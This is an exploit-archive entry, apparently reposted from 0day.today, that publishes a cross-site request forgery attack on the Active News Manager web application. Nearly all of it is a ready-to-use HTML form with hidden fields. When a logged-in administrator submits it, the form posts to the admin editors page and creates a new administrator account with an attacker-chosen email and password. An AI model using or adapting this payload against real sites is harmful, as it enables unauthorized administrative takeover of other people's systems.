id: 18253
date: 05/13/2012
title: Active News Manager CSRF Vulnerability (Add Admin)
author: AtT4CKxT3rR0r1ST
cves: 

Active News Manager CSRF Vulnerability (Add Admin)
====================================================================
####################################################################
.:. Author         : AtT4CKxT3rR0r1ST  [F.Hack@w.cn]
.:. Script         : http://www.gazatem.com/Products/active_news_manager.asp
####################################################################
===[ Exploit ]===
<html>
<head>
<title>Active News Manager [Add Admin]</title>
</head>
<H2>CSRF Add Admin By AtT4CKxT3rR0r1ST</H2>
<form method="POST" name="form0" action="http://localost/admin/editors.asp">
<input type="hidden" name="authorName" value="Admin"/>
<input type="hidden" name="authorMail" value="f.hack@w.cn"/>
<input type="hidden" name="authorPassword" value="123456"/>
<input type="hidden" name="authorPasswordRe" value="123456"/>
<input type="hidden" name="isAdmin" value="1"/>
<input type="hidden" name="func" value="Save Editor"/>
</form>
</body>
</html>
####################################################################



#  0day.today [2023-03-26]  #